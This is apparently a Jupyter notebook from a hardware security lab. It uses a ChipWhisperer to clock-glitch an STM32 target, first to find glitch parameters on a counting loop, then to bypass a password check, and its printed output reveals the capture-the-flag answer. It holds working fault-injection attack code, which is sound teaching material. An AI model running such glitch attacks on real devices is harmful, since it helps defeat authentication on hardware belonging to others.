# FA3/FA4 - Fault injection on real target

With this exercise, you will practice fault injeciton on a real target.

# Challenge

### Characterization

To characterize the best parameters, you will have to glitch a simple function which counts up to 2500. If the right parameters are set, the device should reply with a value different than that.

### Attack

Once the good parameters are found, the next step is to attack the password checking function (same as simulated exercises). 
Again, there are two flags to find :

 * One flag is displayed if the passwortd checking function returns 1
 * The other flag is the correct password

## Chipwhipserer glitch parameters

Lots of parameters can be tweaked to find the *sweet spot* where the device glitches but resumes execution. Most of the parameters are already fixed, but the remaining ones depend on your target.

![](Images/cwlitepro_glitch.webp)


In [14]:
#Imports
import chipwhisperer as cw
import numpy as np
import time
import matplotlib.pyplot as plt

In [13]:
# Chipwhisperer basic configuration

scope = cw.scope()
target = cw.target(scope, cw.targets.SimpleSerial2)
prog = cw.programmers.STM32FProgrammer
scope.default_setup()

#Chipwhisperer clock is fed to the target chip
scope.clock.clkgen_freq = 24E6
target.baud = 230400*24/7.37

cw.set_all_log_levels(cw.logging.CRITICAL)

scope.gain.mode                          changed from low                       to high                     
scope.gain.gain                          changed from 0                         to 30                       
scope.gain.db                            changed from 5.5                       to 24.8359375               
scope.adc.basic_mode                     changed from low                       to rising_edge              
scope.adc.samples                        changed from 24400                     to 5000                     
scope.adc.trig_count                     changed from 7362895                   to 36304338                 
scope.clock.adc_src                      changed from clkgen_x1                 to clkgen_x4                
scope.clock.adc_freq                     changed from 0                         to 25386783                 
scope.clock.adc_rate                     changed from 0.0                       to 25386783.0               
scope.clock.clkgen_

In [15]:
#Helper functions

def target_reset():
    scope.io.nrst = 'low'
    time.sleep(0.05)
    scope.io.nrst = 'high_z'
    time.sleep(0.05)
    target.flush()


In [16]:
#Test that everything goes wekk by sending the loop command and check its output

target_reset()
scope.arm()
target.simpleserial_write("g", bytearray([]))
scope.capture()
val = target.simpleserial_read_witherrors('r', 4, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)
# Should print
# {'valid': True, 'payload': CWbytearray(b'c4 09 00 00'), 'full_response': CWbytearray(b'00 72 04 c4 09 00 00 15 00'), 'rv': bytearray(b'\x00')}

{'valid': True, 'payload': CWbytearray(b'c4 09 00 00'), 'full_response': CWbytearray(b'00 72 04 c4 09 00 00 15 00'), 'rv': bytearray(b'\x00')}


In [17]:
#Basic glitch settings

scope.glitch.clk_src = "clkgen" # glitch counters use the main clock (24MHz)
scope.glitch.output = "glitch_only" # Glitch output signal
scope.glitch.trigger_src = "ext_single" # glitch only after scope.arm() called
scope.io.glitch_lp = True # Enable low power MOSFET
scope.io.glitch_hp = True # Enable high power MOSFET
scope.glitch.repeat = 7 # Number of successive glitches, 7 should be OK for our target

In [6]:
# Characterization loop

# Thic block will iterate over some of the glitch parameters to locate the "sweet spot"
# where the glitches produce an effect

# Change this block accordingly in order to find the parameters that produce
# the maximum amount of glitches before going further the template

# ext_offset is the number of clock cycles after the trigger

for ext_offset in range(1,2):
    scope.glitch.ext_offset = ext_offset
    
    # offset is the percentage into the clock cycle where the glitch starts
    for offset in np.arange(-40.0, 40.0, 0.2):
        scope.glitch.offset = offset
        
        # Width is the percentage of the period to glitch
        for width in  np.arange(32, 39, 0.2):
            scope.glitch.width = width
            
            # Repeat each iteration 5 times to ensure we get consistant results
            count = 0
            for _ in range(5):
                
                #Fun starts here
                target_reset()
                scope.arm()
                target.simpleserial_write("g", bytearray([]))
                ret = scope.capture()
                #scope.io.vglitch_reset()
                
                # read response from target
                val = target.simpleserial_read_witherrors('r', 4, glitch_timeout=10, timeout=30)
                
                # If no response from the chip, assume it crashed
                if val['valid'] is False:
                    print("X", end="")
                    continue
                
                # if counter is different thant the correct value, print the results
                counter = int.from_bytes(val['payload'], byteorder='little')
                if counter != 2500:
                    count += 1
                    print(f"*{counter:08d}*", end="")
                    
                else:
                    print(".", end="")
            if count > 0:
                print()
                print(f"Count {count:02d}\text_offset {ext_offset:02d}\tWidth {width:0.2f}\tOffset {offset:0.2f}")

........................................................................XX.XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.XXXXX.X.XXXX.*00002400*..X
Count 01	ext_offset 01	Width 37.80	Offset -40.00
................................................................................................XX..XXXXXXXXX.XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.XXXXX..X.*00002400*
Count 01	ext_offset 01	Width 37.80	Offset -39.80
X.X...*00002400*.X.
Count 01	ext_offset 01	Width 38.20	Offset -39.80
..................................................................................X........XXX.XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.XXXX........X.............X.........................................................................X........XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX...XXX.X...X.......................X............................................................................XXX.XXX.XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

In [ ]:
r"Count (0\d).*Width ((?:[-]?\d){2}.(\d){2}).*Offset ((?:[-]?\d){2}.(\d){2})"gm

In [19]:
# Attack loop

#With the characterization, use the best parameters to attack the password checking function.

# ext_offset is the number of clock cycles after the trigger
for ext_offset in range(1,30):
    scope.glitch.ext_offset = ext_offset
    
    # offset is the percentage into the clock cycle where the glitch starts
    for offset in np.arange(-30.0, -20.0, 0.4): # TODO shorten range
        scope.glitch.offset = offset
        
        # Width is the percentage of the period to glitch
        for width in  np.arange(37.5, 38, 0.4): # TODO shorten range
            scope.glitch.width = width


            for _ in range(10):

                #Fun starts here

                target_reset()
                scope.arm()
                # Send dummy password
                target.simpleserial_write("p", b"aaaaaaaaaaaaaaaa")
                ret = scope.capture()
                #scope.io.vglitch_reset()

                val = target.simpleserial_read_witherrors('r', 16, glitch_timeout=10, timeout=30)
                if val['valid'] is False:
                    print("X", end="")
                    continue

                result = val['payload']
                if b"NOPE" not in result:
                    print()
                    print(f"ext_offset {ext_offset:02d}\tWidth {width:0.2f}\tOffset {offset:0.2f}\tResult {result.hex()}")
                    try:
                        print(result.decode())
                    except:
                        pass

                else:
                    print(".", end="")


.......................................................................................................................................................................................................................................X....................X
ext_offset 01	Width 37.90	Offset -25.20	Result 5343417b4661756c744d61737465727d
SCA{FaultMaster}
..XXXX............XXX
ext_offset 01	Width 37.90	Offset -24.80	Result 00080000000069140008691400080000
    ii  
XXX
ext_offset 01	Width 37.90	Offset -24.80	Result 00080000000069140008691400080000
    ii  
..........XXXXXX.X
ext_offset 01	Width 37.90	Offset -24.40	Result 00080000000069140008691400080000
    ii  
X........
ext_offset 01	Width 37.50	Offset -24.00	Result 00080000000069140008691400080000
    ii  
.XXXXXXXXXX.....XX...XXXXXX
ext_offset 01	Width 37.90	Offset -23.60	Result 00080000000069140008691400080000
    ii  
XXXX
ext_offset 01	Width 37.50	Offset -23.20	Result 00a00020211400086914000869140008
X....X..XXXXXX.XXXX.X..XXX

In [22]:
# Exemple: attaque caractère par caractère
charset = b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_"

password_guess = bytearray(b"?"*16)  # on va remplir ça progressivement

for pos in range(16):  # chaque position du mot de passe
    for c in charset:
        attempt = bytearray(b"a"*16)
        attempt[pos] = c

        # glitch juste après la vérification de ce caractère
        scope.glitch.ext_offset = 1
        scope.glitch.offset = -24.4  # à ajuster selon ton heatmap
        scope.glitch.width = 37.9

        # envoyer la payload, capturer, lire le résultat
        target_reset()
        scope.arm()
        target.simpleserial_write("p", attempt)
        ret = scope.capture()

        val = target.simpleserial_read_witherrors('r', 16, glitch_timeout=10, timeout=30)
        if val['valid'] and b"NOPE" not in val['payload']:
            password_guess[pos] = c
            break  # on passe au caractère suivant
